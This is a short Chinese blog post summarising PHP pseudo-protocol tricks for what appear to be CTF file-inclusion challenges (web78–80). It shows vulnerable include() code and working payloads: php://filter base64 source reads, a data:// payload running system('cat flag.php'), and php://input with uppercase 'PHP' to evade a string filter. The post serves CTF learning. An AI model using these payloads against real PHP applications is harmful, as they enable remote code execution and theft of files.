发布于2022年10月15日2年前 PHP伪协议总结 - SegmentFault 思否 WEB78 无防护读取源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 伪协议读取后base64解密 payload:?file=php://filter/convert.base64-encode/resource=flag.php web79 data协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,php到是可以用大写绕过,但是文件名flag.php中的php不能大小写,所以用cat这一类的函数,也可以直接base64绕过php ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); ils/120361970 查看源代码 web80 input协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); $file = str_replace("data", "???", $file); include($file); }else{ highlight_file(__FILE__); } php data被过滤 用input协议 继续使用php大小写绕过 GET: ?file=phP://input POST: <?PHP system('tac fl*');?>
创建帐户或登录后发表意见